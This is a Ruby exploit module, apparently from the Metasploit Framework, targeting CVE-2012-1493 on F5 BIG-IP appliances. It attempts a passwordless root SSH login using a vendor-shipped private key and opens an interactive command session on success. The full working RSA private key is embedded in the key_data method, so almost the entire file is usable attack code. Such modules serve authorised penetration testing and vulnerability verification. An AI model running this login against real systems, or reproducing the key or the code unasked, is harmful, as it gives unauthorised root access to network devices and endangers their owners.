GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/ssh'
require 'net/ssh/command_stream'
require 'rex/socket/ssh_factory'
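class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::SSH

  # Module metadata and options.
  #
  # RHOST/RPORT are registered by hand because this module mixes in
  # Remote::SSH rather than Remote::Tcp, which is what normally provides them.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'F5 BIG-IP SSH Private Key Exposure',
        'Description' => %q{
          F5 ships a public/private key pair on BIG-IP appliances that allows
          passwordless authentication to any other BIG-IP box. Since the key is
          easily retrievable, an attacker can use it to gain unauthorized remote
          access as root.
        },
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Privileged' => true,
        'Targets' => [ [ 'Universal', {} ] ],
        'Payload' => {
          'Compat' => {
            'PayloadType' => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
        'Author' => ['egypt'],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt' ],
          [ 'CVE', '2012-1493' ],
          [ 'OSVDB', '82780' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
        ],
        'DisclosureDate' => '2012-06-11',
        'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # A public-key SSH login is an ordinary sshd authentication event, so
          # the attempt (accepted or rejected) is normally recorded in the
          # target's auth logs and is detectable there.
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        # Since we don't include Tcp, we have to register this manually
        Opt::RHOST(),
        Opt::RPORT(22)
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  # helper methods that normally come from Tcp

  # @return [String] the target host from the datastore
  def rhost
    datastore['RHOST']
  end

  # @return [Integer] the target SSH port from the datastore
  def rport
    datastore['RPORT']
  end

  # Attempts a public-key SSH login as +user+ using the embedded key.
  #
  # Every failure path reports itself with print_error so the operator can
  # distinguish an unreachable host from a rejected key; previously a
  # Rex::ConnectionError returned silently with no output at all.
  #
  # @param user [String] account to authenticate as
  # @return [Net::SSH::CommandStream, nil, false] a command stream wrapping the
  #   authenticated connection on success; nil when the connection, negotiation
  #   or an SSH-level error aborted the attempt; false when the server rejected
  #   the key (callers only test truthiness)
  def do_login(user)
    opt_hash = ssh_client_defaults.merge({
      auth_methods: ['publickey'],
      port: rport,
      key_data: [ key_data ]
    })

    # :debug is extremely verbose; only enable it on explicit request.
    opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']

    ssh_socket = nil
    begin
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh_socket = Net::SSH.start(rhost, user, opt_hash)
      end
    rescue Rex::ConnectionError => e
      print_error "#{rhost}:#{rport} SSH - Connection failed: #{e.message}"
      return
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      # Falls through to the `return false` below; the key was not accepted.
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end

    return false unless ssh_socket

    # Hand the authenticated connection to a command stream, which the
    # payload handler will drive via its lsock.
    Net::SSH::CommandStream.new(ssh_socket, logger: self)
  end

  # Logs in as root and, on success, passes the command stream to the handler.
  def exploit
    conn = do_login('root')
    return unless conn

    print_good 'Successful login'
    handler(conn.lsock)
  end

  # The vendor-shipped private key described in CVE-2012-1493.
  #
  # @return [String] PEM-encoded RSA private key passed to Net::SSH as key_data
  def key_data
    <<~EOF
      -----BEGIN RSA PRIVATE KEY-----
      MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
      UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
      OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
      gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
      8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
      7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
      2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
      37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
      RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
      rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
      uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
      Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
      LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
      -----END RSA PRIVATE KEY-----
    EOF
  end
end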